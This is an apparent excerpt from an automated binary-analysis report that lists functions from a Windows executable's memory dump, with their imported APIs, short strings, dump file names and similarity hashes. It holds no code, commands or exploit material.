Instruction Fuzzy Hash: F6519EB261568086F767DB67F890BDA77A1E79EBC4F004116EB8943E75DBB8C480DB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140061550, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32 ref: 0000000140061585
GetFullPathNameW.KERNEL32 ref: 00000001400615D4
GetFileAttributesW.KERNEL32 ref: 000000014006160A
GetFileAttributesW.KERNEL32 ref: 0000000140061620

Part of subcall function 0000000140062210: GetFileAttributesW.KERNEL32 ref: 0000000140062226
Part of subcall function 0000000140062210: GetLastError.KERNEL32 ref: 0000000140062235
Part of subcall function 0000000140062210: CreateDirectoryW.KERNEL32 ref: 00000001400622D8

SHFileOperationW.SHELL32 ref: 000000014006171B

Strings

\, xrefs: 00000001400615B1

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: File$Attributes$FullNamePath$CreateDirectoryErrorLastOperation
String ID: \
API String ID: 3088001423-2967466578
Opcode ID: 75055c802185946d9b41c85bb4dd37f66d1ab0eab66ddf84916e49df4edeeef7
Instruction ID: e822dc4c13cfd005984962f79b3f13831c62ab0ed47445a18235923ea718076b
Opcode Fuzzy Hash: 75055c802185946d9b41c85bb4dd37f66d1ab0eab66ddf84916e49df4edeeef7
Instruction Fuzzy Hash: B4518F36104B8095DB628F26E8403EAB3B1F798794FA84615FB5D537F4EB39C68AC700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014007A360, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

IsDlgButtonChecked.USER32 ref: 000000014007A38F
IsDlgButtonChecked.USER32 ref: 000000014007A3D5
IsDlgButtonChecked.USER32 ref: 000000014007A421
GetDlgCtrlID.USER32 ref: 000000014007A449

Strings

MZ@, xrefs: 000000014007A484

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: ButtonChecked$Ctrl
String ID: MZ@
API String ID: 1858478438-2978689999
Opcode ID: 56c89f61b6e6d4f90868a3ae8ed611a844718ddb79705ab61d8fdf89c54c0c15
Instruction ID: d6d636a8f48c9388388a38f9899297871066f5e9aca874242e2c8e99844577bd
Opcode Fuzzy Hash: 56c89f61b6e6d4f90868a3ae8ed611a844718ddb79705ab61d8fdf89c54c0c15
Instruction Fuzzy Hash: 5C41C176208A9082FB668F23E4947AE67A1F3CDBC4F144521FF4A43AA5CF7DC9528740

Uniqueness

Uniqueness Score: -1.00%

Function 000000014005E110, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 000000014005E14C

Strings

0.0.0.0, xrefs: 000000014005E1A6

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Startup
String ID: 0.0.0.0
API String ID: 724789610-3771769585
Opcode ID: 1f09147d179576e567755aa8753a87933bc9bb4d43950aa7177fbd59ae4bdec9
Instruction ID: abd01cd8ba8664872d5a26cd525624b2cd91d36187c3f77d05ca605348e9a5cf
Opcode Fuzzy Hash: 1f09147d179576e567755aa8753a87933bc9bb4d43950aa7177fbd59ae4bdec9
Instruction Fuzzy Hash: 60416E32204B8081EB6ACB16E4443A973A5F79DBE0F544225EB9A43BE8DF39C985C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000014006C1D6, Relevance: 10.6, APIs: 7, Instructions: 80windowCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32 ref: 000000014006C202
IsDlgButtonChecked.USER32 ref: 000000014006C220
GetForegroundWindow.USER32 ref: 000000014006C237
GetFocus.USER32 ref: 000000014006C243
EnableWindow.USER32 ref: 000000014006C265
GetFocus.USER32 ref: 000000014006C26F
SetFocus.USER32 ref: 000000014006C27E

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: FocusWindow$ButtonCheckedEnableForegroundLong
String ID:
API String ID: 2977627134-0
Opcode ID: e0a5f041e03b53507d837405d2838d1609c24c2363174a151a650b33846ac45f
Instruction ID: dd51ea0723d76d0dc4dfe6fdf87d0d00356e79a44aeecc865ea37c00d2628578
Opcode Fuzzy Hash: e0a5f041e03b53507d837405d2838d1609c24c2363174a151a650b33846ac45f
Instruction Fuzzy Hash: AB31B17231568081FB679767E8647ED2392B79EBD0F644915EB5D47AF4CF78C4908300

Uniqueness

Uniqueness Score: -1.00%

Function 000000014007D250, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73windowCOMMON

Download Yara Rule

APIs

CreatePopupMenu.USER32 ref: 000000014007D2B0
SetMenuDefaultItem.USER32 ref: 000000014007D30A
SetMenuInfo.USER32 ref: 000000014007D33B
CreateMenu.USER32 ref: 000000014007D35A

Part of subcall function 00000001400A6D70: _invalid_parameter_noinfo.LIBCMT ref: 00000001400A6D97

Strings

tray, xrefs: 000000014007D27A
(, xrefs: 000000014007D323

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Menu$Create$DefaultInfoItemPopup_invalid_parameter_noinfo
String ID: ($tray
API String ID: 3884654799-2288760759
Opcode ID: 739038e662e9b36f4cfe733e0e9ab51a53118666ac54393f51f0313c7a169ba2
Instruction ID: fb1fcf00fc809c2e3b1d187015ea7edb8159dd46267b7daf0398b5d030a734b1
Opcode Fuzzy Hash: 739038e662e9b36f4cfe733e0e9ab51a53118666ac54393f51f0313c7a169ba2
Instruction Fuzzy Hash: 3E316172304A4182EB669F27E5443A973B1EB9CBC8F185117EB4D176A9DF3DC8868740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140061290, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 61libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 00000001400612AC
GetProcAddress.KERNEL32 ref: 00000001400612C4
FreeLibrary.KERNEL32 ref: 00000001400612D2
FreeLibrary.KERNEL32 ref: 000000014006132F

Strings

shell32, xrefs: 00000001400612A5
SHEmptyRecycleBinW, xrefs: 00000001400612BA

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Library$Free$AddressLoadProc
String ID: SHEmptyRecycleBinW$shell32
API String ID: 1386263645-3400654119
Opcode ID: d9a7ff40070dd1cbe2ad38bdc6cb837691f6405082efa6e8b76a447e70dcb52e
Instruction ID: efeb7b1463cfbaa00d4dd7a706e3610b66ae704a57fbd831a1a14202730ddf21
Opcode Fuzzy Hash: d9a7ff40070dd1cbe2ad38bdc6cb837691f6405082efa6e8b76a447e70dcb52e
Instruction Fuzzy Hash: F0215732A04A8081EB029B26F8103D96761AB8DBE4F584225EB6D07BF5DE7CC5958700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400AA194, Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 492COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00000001400AA1CF
_invalid_parameter_noinfo.LIBCMT ref: 00000001400AA5A0
_invalid_parameter_noinfo.LIBCMT ref: 00000001400AA841

Strings

p, xrefs: 00000001400AA2DC
f, xrefs: 00000001400AA2D4

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$p
API String ID: 3215553584-1290815066
Opcode ID: 9c5e275eb68c8d3f8dc3f05b30dbf71dc84d31b68438deed7e78a46f035dc513
Instruction ID: d83a6db1f9af87f9f1a6acd931efaa038fe0369134fc8c0e1060b61379dafe94
Opcode Fuzzy Hash: 9c5e275eb68c8d3f8dc3f05b30dbf71dc84d31b68438deed7e78a46f035dc513
Instruction Fuzzy Hash: 2712C532A1865186FB229B16E0047EE76A2F36A7E4FD84311F795076E8D73DC9C18F14

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140012250, Relevance: 9.2, APIs: 6, Instructions: 224threadCOMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 0000000140012357
GetSystemMetrics.USER32 ref: 000000014001239A
GetCursorPos.USER32 ref: 0000000140012417
WindowFromPoint.USER32 ref: 0000000140012422
GetWindowThreadProcessId.USER32 ref: 000000014001244A
IsDlgButtonChecked.USER32 ref: 0000000140012479

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: MetricsSystemWindow$ButtonCheckedCursorFromPointProcessThread
String ID:
API String ID: 2348961981-0
Opcode ID: 30b54a312b5b5897fa13f4edbe91748e535ba43f485d2d9828daa474b2595e65
Instruction ID: 69fbfb0cf9ab8d46c260cc3e94a9ef7b66f286258bbda9ff0031633538d4d3fb
Opcode Fuzzy Hash: 30b54a312b5b5897fa13f4edbe91748e535ba43f485d2d9828daa474b2595e65
Instruction Fuzzy Hash: 2E91013131468086FB769B17A450BEE6796F79DBC0F445015FB860BAF4DA3EC8A4DB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000A630, Relevance: 9.1, APIs: 6, Instructions: 97windowthreadCOMMON

Download Yara Rule

APIs

GetMessageW.USER32 ref: 000000014000A64D
SetWindowsHookExW.USER32 ref: 000000014000A6AB
UnhookWindowsHookEx.USER32 ref: 000000014000A6D0
SetWindowsHookExW.USER32 ref: 000000014000A725
UnhookWindowsHookEx.USER32 ref: 000000014000A743
PostThreadMessageW.USER32 ref: 000000014000A778

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: HookWindows$MessageUnhook$PostThread
String ID:
API String ID: 378849449-0
Opcode ID: 3cbf22508b3b221ec840d2762a574060fc31372760d6c5da4b28a76dcb21c551
Instruction ID: 682dfdd378b8045bc6f5f45ee12bafb38854d2cd7bbf72a36372fc188f42f072
Opcode Fuzzy Hash: 3cbf22508b3b221ec840d2762a574060fc31372760d6c5da4b28a76dcb21c551
Instruction Fuzzy Hash: 79413C72209B4081FA67DB16B9647E923E1AB5E7C4F085129FB4A47BB4EF7DC448A700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400796E0, Relevance: 9.1, APIs: 6, Instructions: 86COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32 ref: 0000000140079723
GetWindowLongW.USER32 ref: 0000000140079751
CheckRadioButton.USER32 ref: 0000000140079779
IsDlgButtonChecked.USER32 ref: 00000001400797BD
GetWindowLongW.USER32 ref: 00000001400797D0
SetWindowLongW.USER32 ref: 00000001400797E5

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: LongWindow$Button$CheckCheckedRadio
String ID:
API String ID: 2321882225-0
Opcode ID: 789211217615ca76b4392b7b4eb0f03dcb959fd5b641c32ef2423fed23d3a2bc
Instruction ID: 3867bdfdbf03aef3b4b3a1196fc0ff2069d4b0ae60df1cd79b241e1deddb76e0
Opcode Fuzzy Hash: 789211217615ca76b4392b7b4eb0f03dcb959fd5b641c32ef2423fed23d3a2bc
Instruction Fuzzy Hash: 4F315436214A8086EB2A8F6BE4857AE7721F3CDB94F544211FB5A07BB4DF39D485C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000014007A540, Relevance: 9.1, APIs: 6, Instructions: 78COMMON

Download Yara Rule

APIs

IsDlgButtonChecked.USER32 ref: 000000014007A58D
IsDlgButtonChecked.USER32 ref: 000000014007A5BC
IsDlgButtonChecked.USER32 ref: 000000014007A5E8
IsDlgButtonChecked.USER32 ref: 000000014007A604
GetWindowRect.USER32 ref: 000000014007A61C
MapWindowPoints.USER32 ref: 000000014007A634

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: ButtonChecked$Window$PointsRect
String ID:
API String ID: 1688774069-0
Opcode ID: 60c5a69eb38acd7506d6466f8b11b7f1fd66f0eaa4b3e97ddf67b1dd6bbcbb4d
Instruction ID: 3113d43b1b69972742f7e0d621a6b848ff5ddc284fe2d5b5bcf80deaff1a785c
Opcode Fuzzy Hash: 60c5a69eb38acd7506d6466f8b11b7f1fd66f0eaa4b3e97ddf67b1dd6bbcbb4d
Instruction Fuzzy Hash: CF31527620468087E7768B26E5547DA6760F3CD7A4F148325EB6A47FE8CF3CC5428B00

Uniqueness

Uniqueness Score: -1.00%

Function 000000014004C670, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

wcsstr.LIBVCRUNTIME ref: 000000014004C773
new.LIBCMT ref: 000000014004C7E7
GetLastError.KERNEL32 ref: 000000014004C845
GetLastError.KERNEL32 ref: 000000014004C89A

Strings

Out of memory., xrefs: 000000014004C80B

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: ErrorLast$wcsstr
String ID: Out of memory.
API String ID: 3604263042-4087320997
Opcode ID: 0b7ea1f7d9bd5bbe86de0786708cb46ed6ae79cfc258ca9f9a92865e0f984e82
Instruction ID: 1647883cd8ada6d1b2ba9cd8a52dc7b0e2d5c894a3f6a2d94f09a79ad9dacfca
Opcode Fuzzy Hash: 0b7ea1f7d9bd5bbe86de0786708cb46ed6ae79cfc258ca9f9a92865e0f984e82
Instruction Fuzzy Hash: 1961263222875482FAA2EB13A410BE927A0B75DBD4F46423AFF59077F1EF39C8459704

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140041030, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32 ref: 0000000140041084

Strings

<<>>, xrefs: 0000000140041168

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: ChildEnumWindows
String ID: <<>>
API String ID: 3555792229-913080871
Opcode ID: 63601af3d655b61d71451ae4ab304cfe0fcdb592c48c22cab2b4263793ab5351
Instruction ID: 8d5cfa4285d46e2788a13cabf1c9b2f144fe3172216dd255c1bd0b01e256b001
Opcode Fuzzy Hash: 63601af3d655b61d71451ae4ab304cfe0fcdb592c48c22cab2b4263793ab5351
Instruction Fuzzy Hash: 2171AE72218B9481FB66CB27AA403DD67A1E7CDBC4F550125FB8A43AF9CB78C8558708

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140076570, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 138COMMON

Download Yara Rule

Strings

Submit, xrefs: 0000000140076596
MZ@, xrefs: 00000001400765AD
Text, xrefs: 000000014007681E

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: _invalid_parameter_noinfo
String ID: MZ@$Submit$Text
API String ID: 3215553584-2059836365
Opcode ID: c298f159907e6c3ce905ce2b7732d4538dd8ad7504312e421c6acd5d8f188dfe
Instruction ID: 4524781a660337f9bb054fe6ad8cc109571b6331d67a609e42e9fce7340791c6
Opcode Fuzzy Hash: c298f159907e6c3ce905ce2b7732d4538dd8ad7504312e421c6acd5d8f188dfe
Instruction Fuzzy Hash: 9451F17271868092FB23EB37A9447E927A0B34D7D4F454621FFAA07AF2DA3CC8558700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014006B610, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 134COMMON

Download Yara Rule

Strings

MZ@, xrefs: 000000014006B765

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID:
String ID: MZ@
API String ID: 0-2978689999
Opcode ID: 80a81d303b913d48b0842752d52b3cf1a4b7f96644d70e40dc08e97536aedca9
Instruction ID: a966e914dd0f52903bbeb4c13f323521481b79b024a76c253a6add671be35cd5
Opcode Fuzzy Hash: 80a81d303b913d48b0842752d52b3cf1a4b7f96644d70e40dc08e97536aedca9
Instruction Fuzzy Hash: 6B515972204A8086EA22DB17E8907E927A2F78CBE4F545615FB9D47BB5DFB8C1858700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000E4F0, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 120sleepCOMMON

Download Yara Rule

APIs

CharUpperW.USER32 ref: 000000014000E5A2
CharUpperW.USER32 ref: 000000014000E5B2
Sleep.KERNEL32 ref: 000000014000E684

Strings

%s%c, xrefs: 000000014000E600
{Raw}, xrefs: 000000014000E5D7

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CharUpper$Sleep
String ID: %s%c${Raw}
API String ID: 3503790639-4244404168
Opcode ID: 6e2b83235ce70e679ca2779a0344e7f383028e290c05e3ff0f774dcda7661531
Instruction ID: 063933cc2ccd45812db57a8c41a582f1b04c337d1a5d3c5903f27e129b8def2e
Opcode Fuzzy Hash: 6e2b83235ce70e679ca2779a0344e7f383028e290c05e3ff0f774dcda7661531
Instruction Fuzzy Hash: 2B519072204AC086E7B6DF26A4003EA77A0F358798F448216EBD9536E4EF38D459CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003D5DC, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 117keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32 ref: 000000014003D5F7
GetKeyState.USER32 ref: 000000014003D5FF
GetTickCount.KERNEL32 ref: 000000014003D6E7

Strings

MZ@, xrefs: 000000014003D65E, 000000014003D712, 000000014003D74A

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: State$CountTick
String ID: MZ@
API String ID: 3508085728-2978689999
Opcode ID: 03d7bbb8c05b5b9c9e594370171d774e02524e570ea474a4f9bc0622619a3120
Instruction ID: fe24e8ca2c74bdea7ccff76bf9dee66d6a07f5a71ee26b9c8d9fe6c0576f8caf
Opcode Fuzzy Hash: 03d7bbb8c05b5b9c9e594370171d774e02524e570ea474a4f9bc0622619a3120
Instruction Fuzzy Hash: 7E51B8B6108A8485F7679B27B0517EB37A0FB4D7C8F544007FB9A83AB5CA38C486DB01

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003E580, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92threadCOMMON

Download Yara Rule

APIs

